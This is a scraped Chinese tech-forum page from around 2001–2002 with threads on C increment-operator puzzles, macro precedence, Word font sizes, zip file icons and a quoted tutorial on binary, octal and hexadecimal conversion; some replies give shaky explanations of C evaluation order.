 发表于 2001-12-18 21:10:58 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
你漏写int i=3了吧？
C/C++都快忘光光了~~~

i++和++i两者虽然都是自加运算表达式，但是运算规则是不同的：
首先，i++表达式的值是i在自加之前就运算所得的值，也就是i的原值；而++i表达式的值是i在自加之后再运算所得的值。比如：int i=3,那么i++表达式的值是i自加前的值，等于3，然后再自加，i=4；而++i是i先自加，i=4，然后再运算++i，所以表达式的值为4。接下去看两个经典的例子：
1. int i=3, 求k=(i++)+(i++)+(i++);
看上去好象应该是k=3+4+5=12，其实不是。运算时根据i++的运算规则，i++表达式先取原值再i自加，所以应该是先取三个原值，k=3+3+3=9，然后再是i做3次自加，i=3+1+1+1=6。
2. int i=3, 求k=(++i)+(++i)+(++i);
计算机对表达式扫描后，根据++i的运算规则，i先自加然后表达式取值，所以应该先进行三次i自加，i=3+1+1+1=6，然后再表达式取值，k=6+6+6=18。

第二个示例已经回答你第二题了，那么第一题，int i=3, 求k=(i++)+(++i)+(i++)就很简单了：
计算机对表达式扫描后，根据++i的运算规则，i先自加然后表达式取值，所以中间的++i先进行i自加，i=i+1=4，++i取值为4，另外两个i++先取值后自加，所以是两个都是这时候i的原值，也就是4，然后进行两次i自加，i=i+1+1=6，k=4+4+4=12。

Turbo C里面的自加减运算运用得当可以增加代码可读性和运行效率，但是也有人为理解误区，像上面这种题目纯粹是为了教学，实际编程中一般不会这样写。由于我长时间不用C/C++，有什么解释得不对还请斧正~~~

[这消息被POPOEVER编辑过(编辑时间2001-12-19 01:45:23)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

梅友酷子

初级用户
积分：70
发帖：28
来自：
注册：2001-10-08
 发表于 2001-12-19 11:27:12 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
完全明白了，太感谢了：）
再问一个小问题：
#define sum 10+20
main()
{
int b=0,c=0;
b=5;
c=sum*b;
printf("%d",c);
}
答案：110
为什么呢？
如果是
#define sum （10+20）
main()
{
int a=0,b=0,c=0;
a=sum;
b=5;
c=sum*b;
printf("%d",c);
}
答案：150 这150怎么算出的我明白，可是第一题的110是怎么回事呢？
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-19 12:39:17 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
1. sum=10+20, sum*b=10+20*5=10+100=110

2. sum=(10+20), sum*b=(10+20)*5=30*5=150

既然sum的赋值是表达式赋值，那么运算时就按照表达式的运算规则。()运算优先，没有()乘除法优先。

[这消息被POPOEVER编辑过(编辑时间2001-12-19 12:40:56)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

梅友酷子

初级用户
积分：70
发帖：28
来自：
注册：2001-10-08
 发表于 2001-12-19 15:31:38 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
太谢谢了，泡泡兄，有问题我再问你啊
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-19 19:07:39 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
靠，我也已经N年不用C/C++了~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 | 主题：一个C的小问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


POPOEVER兄，又要请教你了

计算机技术
POPOEVER兄，又要请教你了

上一贴 | 下一贴
发表人 主题: POPOEVER兄，又要请教你了
梅友酷子

初级用户
积分：70
发帖：28
来自：
注册：2001-10-08
 发表于 2001-12-20 11:17:46 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
若已定义int a=25,b=14,c=19,以下三项运算符（？：）
a++<=25&&b--<=2&&c ++ ? printf("***a=%d,b=%d,c=%d\n",a,b,c):printf("###a=%d,b=%d,c=%d\n"a,b,c)
的执行结果是（ ）
答案：###a=26,b=13,c=19
请问是怎么得出的？

大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2001-12-20 11:28:32 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
出题的人没有指明编译器的话，此题的答案就有问题！ 你不妨在TC＋＋、MSC＋＋、VC、CB上分别试试。

现实中绝对每人会这样写程序，因此不同的编译器对计算顺序不同定义是不会出问题的。

老哥我知道的就这么多了。
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-12-20 14:17:44 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
c为什么是19?

| 收藏贴 |
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-20 14:56:04 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
因为先检测执行前一个逻辑与表达式，这时a++和b--都执行，a=26,b=13，逻辑与表达式显然不满足条件，马上执行printf("###a=%d,b=%d,c=%d\n"a,b,c)，所以c++就跳过不执行了~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-12-20 15:24:53 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
明白了

如果我没记错的话，应该是由于逻辑运算优先于符号运算的关系吧

很久没用c，有些生疏了

老实说，popoever真是个很不错的老师~~~~~

| 收藏贴 |
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-20 17:37:27 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
色眯眯的小疯狗在上个帖子中说
引用:
明白了

如果我没记错的话，应该是由于逻辑运算优先于符号运算的关系吧

Absolutely right!

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 | 主题：POPOEVER兄，又要请教你了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


打印大号的字

计算机技术
打印大号的字

上一贴 | 下一贴
发表人 | 主题: 打印大号的字
JILL 终级用户 积分：575 发帖：175 来自：沈阳市 注册：2001-12-10 | 发表于 2001-12-20 18:30:44 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP 怎样打印大号的字，最大的也就是一号字，可是不还够大，怎么办？比如说招聘时的简报“招 聘（这是特大的）” 誓与WIN2000共存
令狐瓜子 9sun 管理员 积分：5449 发帖：1492 来自：南京 注册：2000-07-07 | 发表于 2001-12-20 20:03:34 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP 直接设定字的磅数，比如120，比一号字大多了。 独孤八剑 Blueidea Web Team. Moderator Of Flash Forum
月闪闪 终级用户 积分：2252 发帖：1261 来自：香格里拉 注册：2000-09-25 | 发表于 2001-12-20 21:00:12 按此观看月闪闪的个人资料 按此发邮件给月闪闪 访问月闪闪的主页 月闪闪 的 oicq 是2855760,查看 2855760 的资料 发送悄悄话给月闪闪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看月闪闪的IP 如果是用WORD的话， 只要按住CTRL+[ 键就可以无限放大了吧，可以赶过可以选择的字号。 要跳要舞，羊男说
xqlyg 超级用户 积分：366 发帖：93 来自：china 注册：2002-02-07 | 发表于 2002-02-07 16:36:24 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP 直接在word字体大小里写上你想要的字的大小 先选黑哦
sony 终级用户 积分：965 发帖：264 来自：浙江省 注册：2001-10-05 | 发表于 2002-02-10 23:35:52 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP 用金山的WPS. HAVE A NICE DAY! 许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
上一贴 | 下一贴
快速回复 | 主题：打印大号的字
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


zip文件的图标？

计算机技术
zip文件的图标？

上一贴 | 下一贴
发表人 主题: zip文件的图标？
magicwind

终级用户
积分：769
发帖：195
来自：上海
注册：2001-07-13
 发表于 2001-12-25 15:34:01 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 收藏该主题供以后查看 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
图标变成windows标志，可还是能双击打开，该如何改过来？

欲穷千里目，更上一层楼。
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2001-12-25 17:21:02 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
重装

18J
[w]
ChilliChilli

初级用户
积分：0
发帖：8
来自：上海市
注册：2001-12-19
 发表于 2001-12-25 17:56:05 按此观看ChilliChilli的个人资料 按此发邮件给ChilliChilli 发送悄悄话给ChilliChilli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ChilliChilli的IP
一定要重装吗？为什么？

今天星期五。
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-25 18:14:18 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
可以重新建立文件关联

如果是Win98
先在zip文件图标上单击选择
然后按住shift键
在文件上单击右键
这样出现的菜单中会有“打开方式……”这个选项

之后从列表中找到WinZip
选中下方的“始终用此程序打开”选项
确定即可

如果简单一些的方法
那就是重装一遍WinZip

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
magicwind

终级用户
积分：769
发帖：195
来自：上海
注册：2001-07-13
 发表于 2001-12-25 18:23:41 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
打开方式试过了！
重装winzip倒可一试！

楼上的兄弟真让我佩服，发1000多贴，只有9分！

[这消息被magicwind编辑过(编辑时间2001-12-25 18:28:06)]

欲穷千里目，更上一层楼。
magicwind

终级用户
积分：769
发帖：195
来自：上海
注册：2001-07-13
 发表于 2001-12-25 18:55:32 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
谢谢，问题解决了！

欲穷千里目，更上一层楼。
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-25 19:03:18 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
图标上点右键选择更改图标

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
magicwind

终级用户
积分：769
发帖：195
来自：上海
注册：2001-07-13
 发表于 2001-12-25 19:26:10 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

欲穷千里目，更上一层楼。
凌志

终级用户
积分：532
发帖：163
来自：鞍山
注册：2001-01-09
 发表于 2001-12-25 20:27:00 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
治病要治本，解决问题也要解决 彻底，当然 有些办法可以达到目的，但是以后碰上这中事情难道也要重装吗？
在文件夹选项中改一下文件关联就行了！

网络天下
四海一家
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-25 20:33:15 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
查错，重启

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-25 20:40:01 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
magicwind在上个帖子中说
引用:
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

呵呵，是我话没讲完，应该是点右键然后属性最后更改图标

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2001-12-26 08:39:48 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
天外飞猪在上个帖子中说
引用:
magicwind在上个帖子中说
引用:
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

呵呵，是我话没讲完，应该是点右键然后属性最后更改图标

98中？？

18J
[w]
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-26 08:50:27 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
随便一个文件夹-----〉工具-----〉文件夹选项------〉文件类型------〉已注册文件类型选winzip 文件------〉高级------------〉更改图标

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：zip文件的图标？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


24M Ultimate IconCollection

计算机技术
24M Ultimate IconCollection

上一贴 | 下一贴
发表人 | 主题: 24M Ultimate IconCollection
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-10 08:12:53 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 收藏该主题供以后查看 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 点击下载 你见过的和没见过的大小图标，基本都有了 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：24M Ultimate IconCollection
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


不好往那个专栏发这帖~~：（

计算机技术
不好往那个专栏发这帖~~：（

上一贴 | 下一贴
发表人 主题: 不好往那个专栏发这帖~~：（
print

终级用户
积分：493
发帖：140
来自：萍乡 江西
注册：2001-12-13
 发表于 2002-01-17 10:57:35 按此观看print的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给print 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看print的IP
二进制，八进制，十进制，十六进制 他们之间怎么运算 怎么表达的呢？麻烦大家有没有关于这的资料呢？谢谢了。

变化并不可怕，可怕的是你不随着变化而变化。
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-17 11:12:11 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
找本书看看吧，基本上一些基础编程的或者讲微机原理的书上都有很详细的介绍。

在网上找了一篇，你看看吧。
http://www.zjou.edu.cn/te/BASE/base14.htm

引用:

1．计数制

在日常生活中，人们习惯于用十进制计数。但是，在实际应用中，还使用其他的计数制，如二进制（两只鞋为一双）、十二进制（十二个信封为一打）、二十四进制（一天24小时）、六十进制（60秒为一分，60分为一小时）等等。这种逢几进一的计数法，称为进位计数法。这种进位计数法的特点是由一组规定的数字来表示任意的数。例如一个二进制数，它只能用0和1，一个十进制数只能用0，1，2，…，9，一个十六进制数用0，1，2，……9和A～F十六个数字符号。
进位计数制的数可以用位权来表示。位权就是在一个数中同个数字在不同的位置上代表不同基数的次幂。任何一个数的值都可以用它的按位权展开式表示：
(R)P=Rn-1*Pn-1+...+R0*P0+R-1*P-1+...+R-n*P-n

其中R是一个P进制的数。P为基数，它可以是2、8、10、16等等。
例如一个十进制数(222.26)10可以表示为：

(222.26)10＝2*102＋2*l01＋2*100+2*l0-1+6*l0-2

在这个例子中，十进制数222.26中的2在不同位置上所代表的值是不相同的，在百位上的值是200，在十位上的值是20，在个位上的值是2，而在小数点后第一位数为0.2。但它在不同位置上的数字符号是相同的。

2．二进制

计算机是由电子器件组成的，考虑到经济、可靠、容易实现、运算简便、节省器件等因素，在计算机中的数都用二进制表示而不用十进制表示。这是因为，二进制计数只需要两个数字符号0和1，在电路中可以用两种不同的状态——低电平（0）和高电平（1）来表示，其运算电路的实现比较简单，要制造有10种稳定状态的电子器件分别代表十进制中的10个数字符号是十分困难的。
在计算机内部，一切信息的存储、处理与传送均采用二进制的形式。但由于二进制数的阅读与书写很不方便，为此，在阅读与书写时又通常用十六进制或八进制来表示，这是因为十六进制和八进制与二进制之间有着非常简单的对应关系，下表给出了常用计数制的对照表。

十进制 二进制 八进制 十六进制
0 0 0 0
1 1 1 1
2 10 2 2
3 11 3 3
4 100 4 4
5 101 5 5
6 110 6 6
7 111 7 7
8 1000 10 8
9 1001 11 9
10 1010 12 A
11 1011 13 B
12 1100 14 C
13 1101 15 D
14 1110 16 E
15 1111 17 F

二进制计数法有如下特点：
l）只有两个数码，即0和1。
2）逢二进一。
3）数码的位置原理。

二、各种数制间的转换

由于不同的进位计数制所用的数字个数是不相同的。利用上表能较方便地对不同数制的数进行转换。

1．二进制转换成十进制

任何一个二进制数的值都用它的按位权展开式表示。例如：将二进制数(10101.11)2转换成十进制数。
(10101.11)2＝1*24＋0*23＋l*22＋0*21＋1*20＋l*2-1＋l*2-2

＝24＋22＋20＋2-1+2-2＝(21.75)10

2．十进制转换成二进制

将十进制整数转换成二进制整数采用“除2取余法”。即将十进制整数除以2，得到一个商和一个余数；再将商除以2，又得到一个商和一个余数；以此类推，直到商等于零为止。

每次得到的余数的倒排列，就是对应二进制数的各位数。

于是，结果是余数的倒排列，即为：

（37）10＝（a5a4a3a2a1a0)＝（100101）2

3．十进制小数转换成二进制小数

十进制小数转换成二进制小数是用“乘2取整法”。即用2逐次去乘十进制小数，将每次得到的积的整数部分按各自出现的先后顺序依次排列，就得到相对应的二进制小数。
将十进制小数0.375转换成二进制小数，其过程如下：

最后结果 [image] 0.375)10＝(0.a1a2a3)2＝(0.011)2

4．八进制转为二进制

将八进制数转换成二进制数是每位八进制数用三位二进制数表示。
例：八进制数(617.34)8转换成二进制数为：
6 1 7 ． 3 4
110 001 111 ．011 100
即(617.34)8＝(110001111.011100)2

5．二进制转为八进制

二进制数转换成八进制数，是将二进制数的整数部分从右向左每三位一组，每一组为一位八进制整数。
二进制小数转换成八进制小数是将小数部分从左至右每三位一组，每一组是一位八进制的小数。若整数和小数部分的最后一组不足三位时，则用0补足三位。例如:

(11001111.0111)2=(011001111.011100)2

=( 3 1 7 . 3 4 )8

6．十六进制转为二进制

由于24＝16，所以每一位十六进制数要用四位二进制数来表示，也就是将每一位十六进制数表示成四位二进制数。
例：将十六进制数(B6E.9)16转换成二进制数为：
B 6 E . 9
1011 0110 1110 . 1001
即（B6E.9)16＝(101101101110.1001)2

7．二进制数转为十六进制

将二进制数转换成十六进制数是将二进数的整数部分从右向左每四位一组，每一组为一位十六进制整数；而二进制小数转换成十六进制小数是将二进制小数部分从左向右每四位一组，每一组为一位十六进制小数。最后一组不足四位时，应在后面用0补足四位。

例：二进制数(1010101011.0110)2，转换成十六进制数为：
0010 1010 1011 ．0110
2 A B . 6

即：(10 1010 1011.0110)2=(2AB.6)16

三、计算机中数的表示与运算

在计算机中，对于一般的数是采用定点数与浮点数两种方法来表示。

1．定点数

所谓定点数是指小数点位置固定不变的数。在计算机中，通常用定点数来表示整数与纯小数，分别称为定点整数与定点小数。
定点整数：一个数的最高二进制位是数符位，用以表示数的符号；而小数点的位置默认为在最低(即最右边）的二进制位的后面，但小数点不单独占一个二进制位，如图所示:

0 1001010010001010001

数符位 数值位 小数位

因此，在一个定点整数中，数符位右边的所有二进制位数表示的是一个整数值。
定点小数：一个数的最高二进制位是数符位，用来表示数的符号；而小数点的位置默认为在数符位后面，不单独占一个二进制位，如图所示：

0 1001010010001010001

数符位|小数位 数值位

因此，在一个定点小数中，数符位右边的所有二进制位数表示的是一个纯小数。

2．浮点数

在计算机中，定点数通常只用于表示整数或纯小数。而对于既有整数部分又有小数部分的数，由于其小数点的位置不固定，一般用浮点数表示。
在计算机中所说的浮点数就是指小数点位置不固定的数。一般地，一个既有整数部分又有小数部分的十进制数D可以表示成如下形式:

D＝R*10N
其中R为一个纯小数，N为一个整数。
如一个十进制数123.456可以表示成：0.123456*103，十进制小数0.00123456可以表示成0.123456*10-2。纯小数R的小数点后第一位一般为非零数字。
同样，对于既有整数部分又有小数部分的二进制数口也可以表示成如下形式：

D＝R*2N

其中R为一个二进制定点小数，称为D的尾数；N为一个二进制定点整数，称为D的阶码，它反映了二进制数D的小数点的实际位置。为了使有限的二进制位数能表示出最多的数字位数，定点小数R的小数点后的第一位（即符号位的后面一位）一般为非零数字（即为“1”）。
在计算机中，通常用一串连续的二进制位来存放二进制浮点数，它的一般结构如图所示：

阶符 N 数符 R

| 阶码部分 | 小数位 尾数部分

考虑到部分朋友上教育网比较慢，还是把文章引过来了。

[这消息被啸编辑过(编辑时间2002-01-17 11:14:45)]

Blueidea Web Team.
Moderator Of Computer Technology Forum
sony

终级用户
积分：965
发帖：264
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 20:50:40 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
厉害! 不过何必如此长篇大论

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-07 16:33:59 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
写那么多不累吗
上一贴 | 下一贴
快速回复 | 主题：不好往那个专栏发这帖~~：（
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


常见问题、问题集锦(一)(二)

计算机技术
常见问题、问题集锦(一)(二)

上一贴 | 下一贴
发表人 主题: 常见问题、问题集锦(一)(二)
嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-06 03:59:11 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 收藏该主题供以后查看 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
说明：
1、本贴分为常见问题和问题集锦两部分，问题集锦是从以前部分帖子（2001.11.7-2002.1.22）里挑选出来的一些有明确答案或者讨论得比较深入的问题，常见问题则是从问题集锦中挑选出来的问的比较多的问题。
2、由于帖子数目很多，建议大家使用IE的查找功能（Ctrl+f5）进行预搜索，看有没有想找的内容，在整理过程中我已尽量以帖子讨论的内容作为帖子的题目。

一、常见问题

关于在win2000\XP上安win98的问题

http://www.blueidea.com/bbs/newsdetail.asp?id=393321&page=

1、浏览器

IE相关反修改集粹
http://www.blueidea.com/bbs/NewsDetail.asp?id=327692

Ie6的BUG(co.cn/ ...)
http://www.blueidea.com/bbs/NewsDetail.asp?id=320605
http://www.blueidea.com/bbs/NewsDetail.asp?id=310843

2、操作系统

windows无法关机
